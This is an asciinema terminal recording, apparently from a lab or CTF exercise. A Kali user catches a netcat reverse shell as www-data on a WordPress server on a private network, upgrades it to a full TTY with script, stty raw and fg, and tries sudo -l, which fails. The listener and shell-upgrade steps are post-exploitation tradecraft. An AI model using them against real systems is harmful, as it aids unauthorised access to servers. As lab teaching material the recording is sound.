{"version": 2, "width": 189, "height": 42, "timestamp": 1772685445, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.015597, "o", "\u001b[?2004h\u001b]0;npc@kali: ~\u0007\u001b[;32mв”Њв”Ђв”Ђ(\u001b[1;34mnpcг‰їkali\u001b[;32m)-[\u001b[0;1m~\u001b[;32m]\r\r\n"]
[0.016543, "o", "\u001b[;32mв””в”Ђ\u001b[1;34m$\u001b[0m \r\u001b[;32mв””в”Ђ\u001b[1;34m$\u001b[0m "]
[1.926876, "o", "c\r\u001b[;32mв””в”Ђ\u001b[1;34m$\u001b[0m \u001b[C"]
[2.829831, "o", "\b\u001b[K\r\u001b[;32mв””в”Ђ\u001b[1;34m$\u001b[0m "]
[3.349894, "o", "n\r\u001b[;32mв””в”Ђ\u001b[1;34m$\u001b[0m \u001b[C"]
[3.509796, "o", "c\r\u001b[;32mв””в”Ђ\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[3.570511, "o", " "]
[4.150237, "o", "-"]
[4.505961, "o", "l"]
[4.927012, "o", "v"]
[5.027001, "o", "n"]
[5.154857, "o", "p"]
[5.29755, "o", " "]
[5.496941, "o", "4"]
[5.760979, "o", "4"]
[5.9509, "o", "4"]
[6.110827, "o", "4"]
[6.405466, "o", "\r\n\u001b[?2004l\r"]
[6.40668, "o", "listening on [any] 4444 ...\r\n"]
[6.844993, "o", "i"]
[6.912617, "o", "d"]
[7.127914, "o", "\r\n"]
[9.751301, "o", "connect to [192.168.6.10] from (UNKNOWN) [192.168.6.162] 47326\r\n"]
[9.752363, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n"]
[18.467095, "o", "\r\n/usr/bin/script  -qc /bin/bash /dev/null"]
[19.071064, "o", "\r\n"]
[19.073763, "o", "www-data@Disk:/var/www/wordpress$ "]
[20.438265, "o", "^Z"]
[20.438652, "o", "\r\n"]
[20.438712, "o", "[1]+  Stopped                    nc -lvnp 4444\r\n\r\n"]
[20.439111, "o", "\u001b[?2004h"]
[20.439338, "o", "\u001b]0;npc@kali: ~\u0007\u001b[;32mв”Њв”Ђв”Ђ(\u001b[1;34mnpcг‰їkali\u001b[;32m)-[\u001b[0;1m~\u001b[;32m]\r\r\n"]
[20.439517, "o", "\u001b[;32mв””в”Ђ\u001b[1;34m$\u001b[0m \r\u001b[;32mв””в”Ђ\u001b[1;34m$\u001b[0m "]
[21.300138, "o", "y\r\u001b[;32mв””в”Ђ\u001b[1;34m$\u001b[0m \u001b[C"]
[21.433989, "o", "y\r\u001b[;32mв””в”Ђ\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[21.556175, "o", "y"]
[21.970545, "o", "\r\n\u001b[?2004l\r"]
[21.973681, "o", "\r\n\r\n\r\nstty raw -echo; fg  \r\n\r\n\r\nreset xterm  \r\nexport TERM=xterm  \r\necho $SHELL  \r\nexport SHELL=/bin/bash  \r\n\r\n\r\n"]
[21.98955, "o", "stty rows 42 cols 189\r\n"]
[21.990237, "o", "\r\n\u001b[?2004h"]
[21.990623, "o", "\u001b]0;npc@kali: ~\u0007\u001b[;32mв”Њв”Ђв”Ђ(\u001b[1;34mnpcг‰їkali\u001b[;32m)-[\u001b[0;1m~\u001b[;32m]\r\r\n"]
[21.990671, "o", "\u001b[;32mв””в”Ђ\u001b[1;34m$\u001b[0m \r\u001b[;32mв””в”Ђ\u001b[1;34m$\u001b[0m "]
[25.452929, "o", "\u001b[7mstty raw -echo; fg\u001b[27m"]
[26.158571, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[Cstty raw -echo; fg\r\n\u001b[?2004l\r"]
[26.159777, "o", "nc -lvnp 4444\n"]
[27.23189, "o", "\r\nwww-data@Disk:/var/www/wordpress$ "]
[30.975027, "o", "\r\n"]
[30.975255, "o", "www-data@Disk:/var/www/wordpress$ reset xterm  \r\n"]
[30.976601, "o", "\u001bc\u001b[!p\u001b[?3;4l"]
[30.977194, "o", "\u001b[4l\u001b>\u001b[?69h\u001b[1;80s\r"]
[31.222767, "o", "\n"]
[31.477854, "o", "\n"]
[31.977854, "o", "www-data@Disk:/var/www/wordpress$ export TERM=xterm  \r\nwww-data@Disk:/var/www/wordpress$ echo $SHELL  \r\n/usr/sbin/nologin\r\nwww-data@Disk:/var/www/wordpress$ export SHELL=/bin/bash  \r\nwww-data@Disk:/var/www/wordpress$ \r\nwww-data@Disk:/var/www/wordpress$ \r\nwww-data@Disk:/var/www/wordpress$ stty rows 42 cols 189\r\n"]
[31.978357, "o", "www-data@Disk:/var/www/wordpress$ \r\nwww-data@Disk:/var/www/wordpress$ "]
[32.589778, "o", "i"]
[32.687367, "o", "d"]
[32.896073, "o", "\r\n"]
[32.897134, "o", "uid=33(www-data) gid=33(www-data) groups=33(www-data)"]
[32.897192, "o", "\r\n"]
[32.897249, "o", "www-data@Disk:/var/www/wordpress$ "]
[33.391605, "o", "id"]
[33.554738, "o", "\b\bstty rows 42 cols 189"]
[33.682511, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bexport SHELL=/bin/bash  "]
[33.814768, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\u001b[11Pcho $SHELL  "]
[33.946718, "o", "\b\b\b\b\b\b\b\b\b\b\b\bxport TERM=xterm  "]
[34.068776, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\u001b[6Preset xterm  "]
[34.422749, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\u001b[6@export TERM=xterm  "]
[34.580753, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\u001b[6Pcho $SHELL  "]
[34.710832, "o", "\b\b\b\b\b\b\b\b\b\b\b\bxport SHELL=/bin/bash  "]
[34.842694, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\u001b[3Pstty rows 42 cols 189"]
[34.972565, "o", "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\bid\u001b[K"]
[35.094538, "o", "\b\b\u001b[K"]
[35.208654, "o", "\u0007"]
[35.973594, "o", "s"]
[36.279832, "o", "u"]
[36.451707, "o", "d"]
[36.452832, "o", "o"]
[37.000446, "o", " "]
[37.101673, "o", "-"]
[37.323761, "o", "l"]
[37.774192, "o", "\r\n"]
[37.776355, "o", "\r\n"]
[37.776756, "o", "We trust you have received the usual lecture from the local System\r\nAdministrator. It usually boils down to these three things:\r\n\r\n    #1) Respect the privacy of others.\r\n    #2) Think before you type.\r\n    #3) With great power comes great responsibility.\r\n\r\r\n"]
[37.77683, "o", "[sudo] password for www-data: "]
[39.085356, "o", "\r\n"]
[39.086283, "o", "sudo: a password is required\r\r\n"]
[39.086766, "o", "www-data@Disk:/var/www/wordpress$ "]
[40.883749, "o", "e"]
[41.105947, "o", "x"]
[41.263811, "o", "i"]
[41.337493, "o", "t"]
[43.198985, "o", "\r\nexit\r\n"]
[51.105095, "o", "\n"]
[51.105653, "o", "\n"]
[51.105768, "o", "\u001b[?2004h"]
[51.105913, "o", "\u001b]0;npc@kali: ~\u0007\u001b[;32mв”Њв”Ђв”Ђ(\u001b[1;34mnpcг‰їkali\u001b[;32m)-[\u001b[0;1m~\u001b[;32m]\r\n"]
[51.106161, "o", "\u001b[;32mв””в”Ђ\u001b[1;34m$\u001b[0m "]
[54.225595, "o", "\u001b[?2004l\r\nexit\n"]
